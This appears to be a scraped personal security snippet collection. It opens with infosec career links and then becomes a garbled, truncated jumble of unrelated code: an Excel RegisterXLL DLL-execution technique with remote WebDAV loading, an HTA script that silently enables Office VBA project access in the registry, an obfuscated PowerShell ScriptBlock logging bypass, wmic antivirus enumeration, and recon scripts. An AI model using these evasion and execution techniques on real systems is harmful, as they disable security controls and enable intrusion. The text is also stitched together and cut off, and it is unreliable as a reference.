TechByTom

How to Build a Successful Information Security Career (Daniel Miessler)
- https://danielmiessler.com/blog/build-successful-infosec-career/#gs.DtVCbbw
The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- http://blog.erratasec.com/2010/04/first-steps-to-career-in-information.html#.WFrbofkrIuU
Hiring your first Security Professional (Peerlyst - Dawid Balut)
- https://www.peerlyst.com/posts/hiring-your-first-security-professional-dawid-balut
How to Start a Career in Cyber security
- https://www.concise-courses.com/security/how-to-start-your-career/
How to Get Into Information Security (ISC^2)
https://www.isc2.org/how-to-get-into-information-security.aspx

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

	var os = require("os");

	//Create function to get CPU information
	function cpuAverage() {

	//Initialise sum of idle and time of cores and fetch CPU info
	var totalIdle = 0, totalTick = 0;
	var cpus = os.cpus();

	//Loop through CPU cores

	<html>
	<head>
	<script>
	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();

	# Simulate fake processes of analysis sandbox/VM that some malware will try to evade
	# This just spawn ping.exe with different names (wireshark.exe, vboxtray.exe, ...)
	# It's just a PoC and it's ugly as f*ck but hey, if it works...

	# Usage: .\fake_sandbox.ps1 -action {start,stop}

	param([Parameter(Mandatory=$true)][string]$action)

	$fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe",
	"VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe",

	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct

	#!/bin/bash
	#
	# crt.sh sub-domain check by 1N3@CrowdShield
	# https://crowdshield.com
	#

	OKBLUE='\033[94m'
	OKRED='\033[91m'
	OKGREEN='\033[92m'
	OKORANGE='\033[93m'

	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ